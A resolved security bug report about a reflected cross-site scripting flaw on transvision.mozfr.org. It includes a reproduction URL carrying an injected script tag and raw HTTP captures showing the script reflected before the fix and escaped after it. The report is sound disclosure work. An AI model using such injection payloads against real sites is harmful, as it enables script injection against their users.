XSS on transvision.mozfr.org

RESOLVED FIXED

Status

Websites
Other
RESOLVED FIXED
2 years ago
a year ago

People

(Reporter: Griffin Francis, Assigned: pascalc)

Tracking

({sec-high, wsec-xss})

Production
sec-high, wsec-xss

Details

(Reporter)

Description

2 years ago
User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36

Steps to reproduce:

Navigate to the following URL - https://transvision.mozfr.org/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=1


Actual results:

There is a cross-site scripting issue present within a Mozilla France subdomain.


Expected results:

Code should be sanitized to protect against malicious input.
CONFIRMED

REQUEST

GET /?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=1 HTTP/1.1
Host: transvision.mozfr.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

RESPONSE

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2016 14:10:37 GMT
Server: Apache/2.4.10 (Debian)
Transvision-perf: Memory: 20447232 (19.5MB); Time: 0.3413s
Cache-Control: max-age=604800
Expires: Thu, 09 Jun 2016 14:10:37 GMT
Vary: Accept-Encoding
Content-Length: 23159
Connection: close
Content-Type: text/html; charset=UTF-8

...SNIP...

    <a href="/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&"><script>alert(1)</script>=1&json=true">af</a> or
    <a href="/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&"><script>alert(1)</script>=1&json=true">af</a>.

...SNIP...
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: sec-high, wsec-xss
pierros: Including you on this bug because I have you as the community sec PoC.

pascal: Including you because I see you're active on the project and fixed previous XSS issues in this application (RE: https://github.com/mozfr/transvision/issues/676).
Flags: needinfo?(pierros)
Flags: needinfo?(pascalc)
griffin: Thanks as always for your submission.  Hope to get someone looking at this soon to fix
(Assignee)

Updated

2 years ago
Assignee: nobody → pascalc
Flags: needinfo?(pascalc)
(Assignee)

Comment 5

2 years ago
The fix is now on production.
CONFIRMED PROD FIX

REQUEST

GET /?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=1 HTTP/1.1
Host: transvision.mozfr.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

RESPONSE

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2016 16:20:47 GMT
Server: Apache/2.4.10 (Debian)
Transvision-perf: Memory: 20447232 (19.5MB); Time: 0.3327s
Cache-Control: max-age=604800
Expires: Thu, 09 Jun 2016 16:20:47 GMT
Vary: Accept-Encoding
Content-Length: 23255
Connection: close
Content-Type: text/html; charset=UTF-8

...SNIP...

    <span>API</span>These results are also available as an API request for
    <a href="/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&&amp;#34;&amp;#62;&amp;#60;script&amp;#62;alert(1)&amp;#60;/script&amp;#62;=1&json=true">af</a> or
    <a href="/?whole_word=on&sourcelocale=af&repo=beta&case_sensitive=on&perfect_match=on&locale=af&search_type=entities&recherche=555-555-0199@example.com&&amp;#34;&amp;#62;&amp;#60;script&amp;#62;alert(1)&amp;#60;/script&amp;#62;=1&json=true">af</a>.
    <br>
    <a href="https://github.com/mozfr/transvision/wiki/JSON-API">Learn more about the Transvision API</a>.

...SNIP...
Status: NEW → RESOLVED
Last Resolved: 2 years ago
Flags: needinfo?(pierros)
Resolution: --- → FIXED
Thanks Pascal for the quick reply and action!
Griffin: I'm moving the discussion for the new bug over to Bug #1277857.  Thanks for the submission!
Group: websites-security
You need to log in before you can comment on or make changes to this bug.